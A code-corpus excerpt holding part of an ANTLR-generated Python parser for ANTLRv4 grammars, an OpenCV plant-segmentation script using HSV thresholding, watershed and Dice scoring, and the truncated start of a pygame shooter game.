def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitBlock" ):
listener.exitBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitBlock" ):
return visitor.visitBlock(self)
else:
return visitor.visitChildren(self)
def block(self):
localctx = ANTLRv4Parser.BlockContext(self, self._ctx, self.state)
self.enterRule(localctx, 108, self.RULE_block)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 571
self.match(ANTLRv4Parser.LPAREN)
self.state = 582
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.OPTIONS) | (1 << ANTLRv4Parser.COLON) | (1 << ANTLRv4Parser.AT))) != 0):
self.state = 573
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.OPTIONS:
self.state = 572
self.optionsSpec()
self.state = 578
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.AT:
self.state = 575
self.ruleAction()
self.state = 580
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 581
self.match(ANTLRv4Parser.COLON)
self.state = 584
self.altList()
self.state = 585
self.match(ANTLRv4Parser.RPAREN)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RulerefContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.value = None # Token
def RULE_REF(self):
return self.getToken(ANTLRv4Parser.RULE_REF, 0)
def argActionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ArgActionBlockContext,0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_ruleref
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleref" ):
listener.enterRuleref(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleref" ):
listener.exitRuleref(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleref" ):
return visitor.visitRuleref(self)
else:
return visitor.visitChildren(self)
def ruleref(self):
localctx = ANTLRv4Parser.RulerefContext(self, self._ctx, self.state)
self.enterRule(localctx, 110, self.RULE_ruleref)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 587
localctx.value = self.match(ANTLRv4Parser.RULE_REF)
self.state = 589
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.BEGIN_ARGUMENT:
self.state = 588
self.argActionBlock()
self.state = 592
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 591
self.elementOptions()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CharacterRangeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.start = None # Token
self.end = None # Token
def RANGE(self):
return self.getToken(ANTLRv4Parser.RANGE, 0)
def STRING_LITERAL(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.STRING_LITERAL)
else:
return self.getToken(ANTLRv4Parser.STRING_LITERAL, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_characterRange
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCharacterRange" ):
listener.enterCharacterRange(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCharacterRange" ):
listener.exitCharacterRange(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitCharacterRange" ):
return visitor.visitCharacterRange(self)
else:
return visitor.visitChildren(self)
def characterRange(self):
localctx = ANTLRv4Parser.CharacterRangeContext(self, self._ctx, self.state)
self.enterRule(localctx, 112, self.RULE_characterRange)
try:
self.enterOuterAlt(localctx, 1)
self.state = 594
localctx.start = self.match(ANTLRv4Parser.STRING_LITERAL)
self.state = 595
self.match(ANTLRv4Parser.RANGE)
self.state = 596
localctx.end = self.match(ANTLRv4Parser.STRING_LITERAL)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TerminalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_terminal
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class TerminalRefContext(TerminalContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.TerminalContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def TOKEN_REF(self):
return self.getToken(ANTLRv4Parser.TOKEN_REF, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTerminalRef" ):
listener.enterTerminalRef(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTerminalRef" ):
listener.exitTerminalRef(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTerminalRef" ):
return visitor.visitTerminalRef(self)
else:
return visitor.visitChildren(self)
class TerminalLitContext(TerminalContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.TerminalContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def STRING_LITERAL(self):
return self.getToken(ANTLRv4Parser.STRING_LITERAL, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTerminalLit" ):
listener.enterTerminalLit(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTerminalLit" ):
listener.exitTerminalLit(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTerminalLit" ):
return visitor.visitTerminalLit(self)
else:
return visitor.visitChildren(self)
def terminal(self):
localctx = ANTLRv4Parser.TerminalContext(self, self._ctx, self.state)
self.enterRule(localctx, 114, self.RULE_terminal)
self._la = 0 # Token type
try:
self.state = 606
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF]:
localctx = ANTLRv4Parser.TerminalRefContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 598
localctx.value = self.match(ANTLRv4Parser.TOKEN_REF)
self.state = 600
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 599
self.elementOptions()
pass
elif token in [ANTLRv4Parser.STRING_LITERAL]:
localctx = ANTLRv4Parser.TerminalLitContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 602
localctx.value = self.match(ANTLRv4Parser.STRING_LITERAL)
self.state = 604
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 603
self.elementOptions()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ElementOptionsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LT(self):
return self.getToken(ANTLRv4Parser.LT, 0)
def elementOption(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.ElementOptionContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionContext,i)
def GT(self):
return self.getToken(ANTLRv4Parser.GT, 0)
def COMMA(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.COMMA)
else:
return self.getToken(ANTLRv4Parser.COMMA, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_elementOptions
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterElementOptions" ):
listener.enterElementOptions(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitElementOptions" ):
listener.exitElementOptions(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitElementOptions" ):
return visitor.visitElementOptions(self)
else:
return visitor.visitChildren(self)
def elementOptions(self):
localctx = ANTLRv4Parser.ElementOptionsContext(self, self._ctx, self.state)
self.enterRule(localctx, 116, self.RULE_elementOptions)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 608
self.match(ANTLRv4Parser.LT)
self.state = 609
self.elementOption()
self.state = 614
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.COMMA:
self.state = 610
self.match(ANTLRv4Parser.COMMA)
self.state = 611
self.elementOption()
self.state = 616
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 617
self.match(ANTLRv4Parser.GT)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ElementOptionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.IdentifierContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,i)
def ASSIGN(self):
return self.getToken(ANTLRv4Parser.ASSIGN, 0)
def STRING_LITERAL(self):
return self.getToken(ANTLRv4Parser.STRING_LITERAL, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_elementOption
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterElementOption" ):
listener.enterElementOption(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitElementOption" ):
listener.exitElementOption(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitElementOption" ):
return visitor.visitElementOption(self)
else:
return visitor.visitChildren(self)
def elementOption(self):
localctx = ANTLRv4Parser.ElementOptionContext(self, self._ctx, self.state)
self.enterRule(localctx, 118, self.RULE_elementOption)
try:
self.state = 626
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,84,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 619
self.identifier()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 620
self.identifier()
self.state = 621
self.match(ANTLRv4Parser.ASSIGN)
self.state = 624
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF]:
self.state = 622
self.identifier()
pass
elif token in [ANTLRv4Parser.STRING_LITERAL]:
self.state = 623
self.match(ANTLRv4Parser.STRING_LITERAL)
pass
else:
raise NoViableAltException(self)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IdentifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_identifier
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class RuleRefIdentifierContext(IdentifierContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.IdentifierContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def RULE_REF(self):
return self.getToken(ANTLRv4Parser.RULE_REF, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleRefIdentifier" ):
listener.enterRuleRefIdentifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleRefIdentifier" ):
listener.exitRuleRefIdentifier(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleRefIdentifier" ):
return visitor.visitRuleRefIdentifier(self)
else:
return visitor.visitChildren(self)
class TokenRefIdentifierContext(IdentifierContext):
    """Labelled alternative of `identifier` matching a TOKEN_REF token (ANTLR-generated)."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.IdentifierContext
        super().__init__(parser)
        self.value = None # Token
        self.copyFrom(ctx)

    def TOKEN_REF(self):
        return self.getToken(ANTLRv4Parser.TOKEN_REF, 0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterTokenRefIdentifier" ):
            listener.enterTokenRefIdentifier(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitTokenRefIdentifier" ):
            listener.exitTokenRefIdentifier(self)

    def accept(self, visitor:ParseTreeVisitor):
        # Visitor dispatch: fall back to generic child visiting when the
        # visitor does not implement the specific callback.
        if hasattr( visitor, "visitTokenRefIdentifier" ):
            return visitor.visitTokenRefIdentifier(self)
        else:
            return visitor.visitChildren(self)
def identifier(self):
    """Parse the `identifier` rule: RULE_REF | TOKEN_REF (ANTLR-generated)."""
    localctx = ANTLRv4Parser.IdentifierContext(self, self._ctx, self.state)
    self.enterRule(localctx, 120, self.RULE_identifier)
    try:
        self.state = 630
        self._errHandler.sync(self)
        # Decide the alternative from one token of lookahead.
        token = self._input.LA(1)
        if token in [ANTLRv4Parser.RULE_REF]:
            localctx = ANTLRv4Parser.RuleRefIdentifierContext(self, localctx)
            self.enterOuterAlt(localctx, 1)
            self.state = 628
            localctx.value = self.match(ANTLRv4Parser.RULE_REF)
            pass
        elif token in [ANTLRv4Parser.TOKEN_REF]:
            localctx = ANTLRv4Parser.TokenRefIdentifierContext(self, localctx)
            self.enterOuterAlt(localctx, 2)
            self.state = 629
            localctx.value = self.match(ANTLRv4Parser.TOKEN_REF)
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
| 36.777166 | 368 | 0.593405 | 189,908 | 0.887852 | 0 | 0 | 0 | 0 | 0 | 0 | 27,044 | 0.126435 |
e2e488741305886db9ebd01a54b31478a708d79b | 14,876 | py | Python | PlantDetector.py | julzerinos/python-opencv-plant_detection | f7895d42cdf6c8d8a7fa43dd624024f185542207 | [
"MIT"
] | 10 | 2020-08-29T08:30:24.000Z | 2022-02-15T14:06:19.000Z | PlantDetector.py | julzerinos/python-opencv-plant_detection | f7895d42cdf6c8d8a7fa43dd624024f185542207 | [
"MIT"
] | null | null | null | PlantDetector.py | julzerinos/python-opencv-plant_detection | f7895d42cdf6c8d8a7fa43dd624024f185542207 | [
"MIT"
] | 3 | 2020-08-29T08:30:31.000Z | 2021-01-09T07:52:45.000Z | import cv2 as cv # opencv
import copy # for deepcopy on images
import numpy as np # numpy
from random import randint # for random values
import threading  # for daemon processing
from pathlib import Path # for directory information
import os # for directory information
from constants import constants # constants
class PlantDetector:
    """Interactively apply plant-detection algorithms to KOMATSUNA images.

    Images and labels follow the naming convention of the KOMATSUNA dataset
    (http://limu.ait.kyushu-u.ac.jp/~agri/komatsuna/).

    Display modes (window1 / window2):
        0: original (fallback)             / original
        1: HSV inRange filter              / original
        2: bare watershed masks            / labels
        3: watershed masks with background / original
        4: sequential bg subtraction       / original
        5: bg subtraction with watershed   / original

    Interactive keys handled by :meth:`parse`:
        m / n : next / previous image
        s / z : save current image / save all images in the selected mode
        d / f : dice for current segmentation / dice summary (saved images)
        1-5   : select the respective display mode
        esc   : exit the program
    """
def __init__(self, src='multi_plant', labels='multi_label'):
    """Set up display windows, HSV trackbars and per-plant image data.

    Loads plant/label images from *src* and *labels*, then pre-computes a
    background-subtraction mask sequence for every plant group.
    """
    self.c = constants()
    self.window1 = self.c.window.window1
    self.window2 = self.c.window.window2
    # window1 carries the HSV trackbars; window2 shows the original/label.
    cv.namedWindow(self.window1)
    cv.namedWindow(self.window2)
    cv.moveWindow(self.window2, 550, 90)
    cv.createTrackbar(
        self.c.HSV.low_H_name, self.window1, self.c.HSV.low_H,
        self.c.HSV.max_value_H, self.on_low_H_thresh_trackbar)
    cv.createTrackbar(
        self.c.HSV.high_H_name, self.window1, self.c.HSV.high_H,
        self.c.HSV.max_value_H, self.on_high_H_thresh_trackbar)
    cv.createTrackbar(
        self.c.HSV.low_S_name, self.window1, self.c.HSV.low_S,
        self.c.HSV.max_value, self.on_low_S_thresh_trackbar)
    cv.createTrackbar(
        self.c.HSV.high_S_name, self.window1, self.c.HSV.high_S,
        self.c.HSV.max_value, self.on_high_S_thresh_trackbar)
    cv.createTrackbar(
        self.c.HSV.low_V_name, self.window1, self.c.HSV.low_V,
        self.c.HSV.max_value, self.on_low_V_thresh_trackbar)
    cv.createTrackbar(
        self.c.HSV.high_V_name, self.window1, self.c.HSV.high_V,
        self.c.HSV.max_value, self.on_high_V_thresh_trackbar)
    self.plants, self.plant_groups, self.labels = self.prepare_plant_collection(src, labels)
    # source https://docs.opencv.org/3.4/d1/dc5/tutorial_background_subtraction.html
    # Replace each group's raw frames with foreground masks, applied in
    # sequence so the subtractor accumulates the group's background model.
    for key in self.plant_groups:
        if self.c.bgsub.mod == 'MOG2':
            backSub = cv.createBackgroundSubtractorMOG2(history=60, detectShadows=True)
        elif self.c.bgsub.mod == 'KNN':
            backSub = cv.createBackgroundSubtractorKNN()
        fgMask = None
        for i, image in enumerate(self.plant_groups[key]):
            fgMask = backSub.apply(image)
            self.plant_groups[key][i] = fgMask
def on_low_H_thresh_trackbar(self, val):
    """Trackbar callback: set the lower hue bound, kept below the upper bound."""
    self.c.HSV.low_H = min(val, self.c.HSV.high_H - 1)
    cv.setTrackbarPos(
        self.c.HSV.low_H_name, self.window1, self.c.HSV.low_H)
def on_high_H_thresh_trackbar(self, val):
    """Trackbar callback: set the upper hue bound, kept above the lower bound."""
    self.c.HSV.high_H = max(val, self.c.HSV.low_H + 1)
    cv.setTrackbarPos(
        self.c.HSV.high_H_name, self.window1, self.c.HSV.high_H)
def on_low_S_thresh_trackbar(self, val):
    """Trackbar callback: set the lower saturation bound, below the upper bound."""
    self.c.HSV.low_S = min(val, self.c.HSV.high_S - 1)
    cv.setTrackbarPos(
        self.c.HSV.low_S_name, self.window1, self.c.HSV.low_S)
def on_high_S_thresh_trackbar(self, val):
    """Trackbar callback: set the upper saturation bound, above the lower bound."""
    self.c.HSV.high_S = max(val, self.c.HSV.low_S + 1)
    cv.setTrackbarPos(
        self.c.HSV.high_S_name, self.window1, self.c.HSV.high_S)
def on_low_V_thresh_trackbar(self, val):
    """Trackbar callback: set the lower value bound, below the upper bound."""
    self.c.HSV.low_V = min(val, self.c.HSV.high_V - 1)
    cv.setTrackbarPos(
        self.c.HSV.low_V_name, self.window1, self.c.HSV.low_V)
def on_high_V_thresh_trackbar(self, val):
    """Trackbar callback: set the upper value bound, above the lower bound."""
    self.c.HSV.high_V = max(val, self.c.HSV.low_V + 1)
    cv.setTrackbarPos(
        self.c.HSV.high_V_name, self.window1, self.c.HSV.high_V)
def prepare_plant_collection(self, src, labelsrc):
    """Load plant images from *src* and label images from *labelsrc*.

    Returns ``(plants, plant_groups, labels)`` where *plants* is a list of
    ``{'p': image, 'n': filename}`` dicts and *plant_groups* maps a group id
    (derived from the filename) to that group's image list.
    """
    plants = []
    plant_groups = {}
    for fl in sorted(os.listdir(src)):
        img = cv.imread(src + '/' + fl, cv.IMREAD_COLOR)
        if img is None:
            # NOTE(review): a bad read silently terminates the process.
            exit()
        plants.append({'p': img, 'n': fl})
        parts = fl.split("_")
        group_id = f'{parts[1]}{parts[2]}'
        plant_groups.setdefault(group_id, []).append(img)
    labels = []
    for fl in sorted(os.listdir(labelsrc)):
        img = cv.imread(labelsrc + '/' + fl)
        if img is None:
            exit()
        labels.append(img)
    return plants, plant_groups, labels
def parse(self, auto_inc=False, mode=0):
    """Main interactive loop: display, key handling, saving and dice.

    With ``auto_inc=True`` the loop instead walks every image once, saving
    each one in *mode* (used by the 'save all' command).
    """
    key = 0
    i = 0
    l_tog = False  # when True, window2 shows the label instead of the original
    while key != self.c.cntr.exit_k:
        if auto_inc and i == len(self.plants):
            break
        image = copy.deepcopy(self.plants[i]['p'])
        group_id = f'{self.plants[i]["n"].split("_")[1]}{self.plants[i]["n"].split("_")[2]}'
        # 'markers' here is the input image with watershed regions painted on.
        mask, markers, im_threshold = self.HSV_filtering_and_watershed(image)
        _, bgfgSegMarkers, _ = self.HSV_filtering_and_watershed(
            cv.cvtColor(self.plant_groups[group_id][i % 60], cv.COLOR_GRAY2BGR)
        )
        # Pick the image and caption for the selected display mode.
        if mode == 5:
            alt = bgfgSegMarkers
            text = f'Watershed new areas w/ fg/bg segm. {self.plants[i]["n"]}'
            tcol = (255, 255, 255)
        elif mode == 4:
            alt = copy.deepcopy(self.plant_groups[group_id][i % 60])
            text = f'FG/BG segmentation {self.plants[i]["n"]}'
            tcol = (255, 255, 255)
        elif mode == 3:
            alt = markers
            text = f'Watershed algorithm areas w/ bg {self.plants[i]["n"]}'
            tcol = (0, 0, 0)
        elif mode == 2:
            alt = mask
            text = f'Watershed algorithm areas bare {self.plants[i]["n"]}'
            tcol = (255, 255, 255)
        elif mode == 1:
            alt = im_threshold
            text = f'HSV inRange threshold {self.plants[i]["n"]}'
            tcol = (255, 255, 255)
        else:
            alt = copy.deepcopy(self.plants[i]['p'])
            text = f'Original {self.plants[i]["n"]}'
            tcol = (0, 0, 0)
        if self.c.asth.text:
            cv.putText(alt, text, (0, 20), self.c.asth.font, .5, tcol, 1)
        cv.imshow(self.window1, alt)
        if l_tog:
            cv.imshow(self.window2, self.labels[i])
        else:
            cv.imshow(self.window2, self.plants[i]['p'])
        key = cv.waitKey(10)
        # Navigation / save / dice commands.
        if key == self.c.cntr.prev_k and i > 0:
            i -= 1
        if key == self.c.cntr.next_k and i < len(self.plants) - 1:
            i += 1
        if key == self.c.cntr.save or auto_inc:
            self.save_one(mode, alt, self.plants[i]["n"])
        if key == self.c.cntr.save_all:
            self.parse(True, mode)
        if key == self.c.cntr.dice:
            print(self.dicify_one_dynamic(mask, self.plants[i]['n']))
        if key == self.c.cntr.dice_more:
            self.dicify_wrapper(self.plants[i]['n'])
        # Mode selection; mode 2 displays the labels in window2.
        if key == self.c.cntr.m1_k:
            mode = 1
            l_tog = False
        elif key == self.c.cntr.m2_k:
            mode = 2
            l_tog = True
        elif key == self.c.cntr.m3_k:
            mode = 3
            l_tog = False
        elif key == self.c.cntr.m4_k:
            mode = 4
            l_tog = False
        elif key == self.c.cntr.m5_k:
            mode = 5
            l_tog = False
        if auto_inc:
            i += 1
def save_one(self, mode, image, filename):
    """Persist *image* as ``formatted/<mode-name>/<filename>``.

    Bug fix: the previous version ignored the *filename* argument and wrote
    every image to the same literal path, so successive saves overwrote
    each other.
    """
    out_dir = Path(f'formatted/{self.c.cntr.modes[mode]}')
    out_dir.mkdir(parents=True, exist_ok=True)
    cv.imwrite(str(out_dir / filename), image)
def HSV_filtering_and_watershed(self, input_im):
    """Threshold *input_im* in HSV space and segment it with watershed.

    Returns ``(mask, input_im, im_threshold)``: the colored watershed
    regions on black, the input with regions painted over it, and the raw
    HSV threshold image.
    """
    # Keep only pixels inside the trackbar-selected HSV range.
    im_threshold = cv.inRange(
        cv.cvtColor(input_im, cv.COLOR_BGR2HSV),
        (self.c.HSV.low_H, self.c.HSV.low_S, self.c.HSV.low_V),
        (self.c.HSV.high_H, self.c.HSV.high_S, self.c.HSV.high_V)
    )
    # source https://docs.opencv.org/master/d3/db4/tutorial_py_watershed.html
    kernel = np.ones((3, 3), np.uint8)
    opening = cv.morphologyEx(im_threshold, cv.MORPH_OPEN, kernel, iterations=5)
    sure_bg = cv.dilate(opening, kernel, iterations=7)
    dist_transform = cv.distanceTransform(opening, cv.DIST_L2, 5)
    _, sure_fg = cv.threshold(dist_transform, 0.3*dist_transform.max(), 255, 0)
    sure_fg = np.uint8(sure_fg)
    # Pixels that are neither surely background nor surely foreground.
    unknown = cv.subtract(sure_bg, sure_fg)
    _, markers = cv.connectedComponents(sure_fg)
    markers = markers + 1
    markers[unknown == 255] = 0
    markers = cv.watershed(input_im, markers)
    # Watershed boundaries are labelled -1; paint them blue (BGR).
    input_im[markers == -1] = [255, 0, 0]
    for i in range(2, markers.max() + 1):
        # Color each region: random if "disco" mode, else deterministic.
        input_im[markers == i] = [
            randint(0, 255), randint(0, 255), randint(0, 255)
        ] if self.c.xtra.disco else [
            (40 + i * 40) % 255, (i * 40) % 255, (50 + i * 40) % 255
        ]
    mask = copy.deepcopy(input_im)
    mask[markers < 2] = [0, 0, 0]
    return mask, input_im, im_threshold
def dicify_wrapper(self, image_id):
    """Run the dice summary on a daemon thread so the UI loop is not blocked."""
    worker = threading.Thread(
        target=self.dicify_summary, args=(image_id,), daemon=True)
    worker.start()
def dicify_summary(self, image_id):
    """Print the dataset-wide dice summary (based on saved images).

    NOTE(review): *image_id* is currently unused — presumably intended for a
    per-image line in the summary; confirm before relying on it.
    """
    print(self.dicify_all())
def dicify_one(self, image_id):
    """Dice coefficient between the saved watershed mask and the label image.

    Both images are read from disk (``formatted/ws_mask`` vs ``multi_label``)
    and binarized before comparison.
    """
    # Source: https://github.com/Kornelos/CV_MINI_1/blob/master/process_plants.py
    img = cv.imread(f'multi_label/label_{image_id.split("_", 1)[1]}')
    img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
    _, gt = cv.threshold(img, 1, 255, cv.THRESH_BINARY)
    img = cv.imread(f'formatted/ws_mask/{image_id}')
    img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
    _, rt = cv.threshold(img, 1, 255, cv.THRESH_BINARY)
    k = 255
    # dice = 2*|X∩Y| / (|X| + |Y|), counted over the foreground value k.
    dice = np.sum(rt[gt == k]) * 2.0 / (np.sum(rt[rt == k]) + np.sum(gt[gt == k]))
    return dice
def dicify_one_dynamic(self, mask, image_id):
    """Dice coefficient between the in-memory *mask* and the saved label image."""
    img = cv.imread(f'multi_label/label_{image_id.split("_", 1)[1]}')
    img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
    _, gt = cv.threshold(img, 1, 255, cv.THRESH_BINARY)
    img = cv.cvtColor(mask, cv.COLOR_BGR2GRAY)
    _, rt = cv.threshold(img, 1, 255, cv.THRESH_BINARY)
    k = 255
    # dice = 2*|X∩Y| / (|X| + |Y|), counted over the foreground value k.
    dice = np.sum(rt[gt == k]) * 2.0 / (np.sum(rt[rt == k]) + np.sum(gt[gt == k]))
    return dice
def dicify_plant(self, plant_id):
    """Return [mean, min, max] dice over all saved images of *plant_id*."""
    scores = [
        self.dicify_one(entry['n'])
        for entry in self.plants
        if entry['n'].split('_')[2] == plant_id
    ]
    return [np.mean(scores), min(scores), max(scores)]
def dicify_all(self):
    """Build a text table of dice statistics per plant and overall."""
    means, mins, maxs = [], [], []
    rows = ["id | mean | min | max"]
    for i in range(0, 5):
        mean_v, min_v, max_v = self.dicify_plant(f'0{str(i)}')
        means.append(mean_v)
        mins.append(min_v)
        maxs.append(max_v)
        rows.append(f'0{str(i)} | {round(mean_v, 3)} | {round(min_v, 3)} | {round(max_v, 3)}')
    # Final row: summary across all plants.
    rows.append(f'sm | {round(np.mean(means), 3)} | {round(min(mins), 3)} | {round(max(maxs), 3)}')
    return "\n".join(rows)
# Main
# NOTE(review): this runs at import time; consider an
# `if __name__ == "__main__":` guard so the GUI does not start when the
# module is merely imported.
plDt = PlantDetector()
plDt.parse()
| 36.106796 | 103 | 0.576768 | 14,503 | 0.974926 | 0 | 0 | 0 | 0 | 0 | 0 | 4,505 | 0.302837 |
e2e4c9ad3d9448aaf89ca9204aebc30bfaa811af | 3,061 | py | Python | shooter_game.py | TaseeTee/shooter_game | f21e128ee12b58ac230d14868b790178d11bf7c6 | [
"CC0-1.0"
] | null | null | null | shooter_game.py | TaseeTee/shooter_game | f21e128ee12b58ac230d14868b790178d11bf7c6 | [
"CC0-1.0"
] | null | null | null | shooter_game.py | TaseeTee/shooter_game | f21e128ee12b58ac230d14868b790178d11bf7c6 | [
"CC0-1.0"
] | null | null | null | from pygame import *
from random import randint
window = display.set_mode((700, 500))  # 700x500 playfield
display.set_caption('Шутер')
lost = 0  # enemies that slipped past the bottom edge
c = 0  # enemies shot down
class GameSprite(sprite.Sprite):
    """Base sprite: a scaled image at a position, with a movement speed."""

    def __init__(self, player_image, player_x, player_y, player_w, player_h, player_speed):
        super().__init__()
        # Load and scale the sprite image to the requested size.
        self.image = transform.scale(image.load(player_image), (player_w, player_h))
        self.speed = player_speed
        self.rect = self.image.get_rect()
        self.rect.x = player_x
        self.rect.y = player_y

    def reset(self):
        # Blit the sprite onto the window at its current position.
        window.blit(self.image, (self.rect.x, self.rect.y))
class PlayerSprite(GameSprite):
    """The player's rocket: keyboard-driven horizontal movement and shooting."""

    def update(self):
        """Move left/right with A/D, clamped to the playfield edges."""
        pressed = key.get_pressed()
        if pressed[K_d] and self.rect.x < 625:
            self.rect.x += 10
        if pressed[K_a] and self.rect.x > 5:
            self.rect.x -= 10

    def fire(self):
        """Spawn a bullet at the rocket's nose and play the shot sound."""
        shot = Bullet('bullet.png', self.rect.centerx, self.rect.top, 15, 20, -15)
        bullets.add(shot)
        mfire.play()
# NOTE(review): the leading "Е" in this class name is a CYRILLIC letter, not
# the Latin "E" — keep the spelling byte-identical when referencing it.
class ЕnemySprite(GameSprite):
    """UFO enemy: drifts downward and respawns at the top once off-screen."""

    def update(self):
        self.rect.y += 2
        global lost
        if self.rect.y > 500:
            # Left the 500-px-tall window: respawn at a random x, count a miss.
            self.rect.x = randint(80, 420)
            self.rect.y = 0
            lost += 1
class Bullet(GameSprite):
    """Player projectile: flies straight up and despawns at the top edge.

